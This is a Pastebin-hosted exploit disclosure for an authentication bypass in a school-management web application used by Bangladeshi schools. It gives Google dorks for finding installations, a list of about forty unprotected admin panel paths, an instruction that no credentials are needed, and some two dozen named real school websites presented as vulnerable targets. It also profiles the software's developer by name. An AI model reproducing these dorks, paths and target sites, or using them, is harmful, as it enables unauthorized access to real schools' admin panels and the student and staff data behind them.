Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###########################################################################
- # Exploit Title : Technical Support StitBD Engr Rashedul Islam Improper Authentication
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 03/03/2019
- # Vendor Homepages : stitbd.com ~ rashedul.info
- # Information about Software : stitbd.com/#work
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks :
- intext:Develop By: Engr. Rashedul Islam Technical Support: STITBD site:edu.bd
- intext:Develop By: Engr. Rashedul Islam site:edu.bd
- intext:Technical Support: STITBD site:edu.bd
- # Vulnerability Type :
- CWE-287 [ Improper Authentication ]
- CWE-592 [ Authentication Bypass Issues ]
- CWE-305 [ Authentication Bypass by Primary Weakness ]
- CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
- CWE-302 [ Authentication Bypass by Assumed-Immutable Data ]
- CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###########################################################################
- # Information about Software and Owner :
- *************************************
- Dr. Md Rashedul Islam who is a web developer is a supervisor by Computer Vision &
- Pattern Recognition Lab, University of Asia Pacific.
- He is a researcher at School of Computer Science and Engineering, University of Aizu, Japan.
- And the web developer is Associate Professor at Dept. of CSE,
- University of Asia Pacific, Dhaka, Bangladesh and created and helped by StitBD Software
- Company for Bangladeshi Education School Management Pro websites.
- ###########################################################################
- # Impact :
- **********
- * When an actor claims to have a given identity, the software does not prove or insufficiently
- proves that the claim is correct.
- * The authentication algorithm is sound, but the implemented mechanism can be bypassed
- as the result of a separate weakness that is primary to the authentication error.
- * This product requires authentication, but the product has an alternate path or
- channel that does not require authentication.
- * The authentication scheme or implementation uses key data elements that are assumed
- to be immutable, but can be controlled or modified by the attacker.
- ###########################################################################
- # Authentication Bypass/Improper Authentication Exploit :
- *************************************************
- Admin Panel Login Path :
- **********************
- /login.php
- /SMS/index.php
- VULNERABLESITE:2096
- Note : No need to know admin username and admin password
- Just add this file names after admin/
- You are in the Admin Panel - Congratulations :)
- # Useable Admin Control Panel Links :
- **********************************
- /admin/admin.zip
- /admin/baner.php
- /admin/class_routine.php
- /admin/egeneral_notice.php
- /admin/employees_attendance.php
- /admin/exam_routine.php
- /admin/executive_council.php
- /admin/executive_councile.php
- /admin/general_notice.php
- /admin/headmaster_message.php
- /admin/history.php
- /admin/hsc_result.php
- /admin/jsc_result.php
- /admin/lecture_plan.php
- /admin/lesson_plan.php
- /admin/library.php
- /admin/office_order.php
- /admin/photo.php
- /admin/photo1.php
- /admin/photo1e.php
- /admin/photoe.php
- /admin/president_message.php
- /admin/result.php
- /admin/resulte.php
- /admin/school_name.php
- /admin/scout_list.php
- /admin/scout_liste.php
- /admin/ssc_result.php
- /admin/stu_attendance.php
- /admin/stu_info.php
- /admin/stu_infoe.php
- /admin/student.php
- /admin/studente.php
- /admin/t_attendance.php
- /admin/teacher.php
- /admin/teacher_image.php
- /admin/teachere.php
- /admin/user.php
- /admin/usere.php
- ###########################################################################
- # Example Vulnerable Sites :
- *************************
- [+] kphs1972.edu.bd/admin/president_message.php
- [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
- [+] paishahs.edu.bd/admin/president_message.php
- [+] harinathpuramhighschool.edu.bd/admin/president_message.php
- [+] alampurnmhighschool.edu.bd/admin/president_message.php
- [+] harinathpuramhighschool.edu.bd/admin/president_message.php
- [+] tarakandihighschoolsrj.edu.bd/admin/president_message.php
- [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
- [+] gandhailgirlshighschool.edu.bd/admin/president_message.php
- [+] purbokhukshiahighschool.edu.bd/admin/president_message.php
- [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
- [+] goalbathanhighschool.edu.bd/admin/president_message.php
- [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
- [+] sajanpurihs113503.edu.bd/admin/president_message.php
- [+] mahdm2002.edu.bd/admin/president_message.php
- [+] abdulabadbhohumukhihighschool.edu.bd/admin/president_message.php
- [+] rrhs.edu.bd/admin/president_message.php
- [+] bhakhs.edu.bd/admin/president_message.php
- [+] srnhs.edu.bd/admin/president_message.php
- [+] bjkhs1883.edu.bd/admin/president_message.php
- [+] gareyafazilmadrasha.edu.bd/admin/president_message.php
- [+] haldiahs.edu.bd/admin/president_message.php
- [+] sirjcboseic.edu.bd/admin/president_message.php
- ###########################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###########################################################################
Add Comment
Please, Sign In to add comment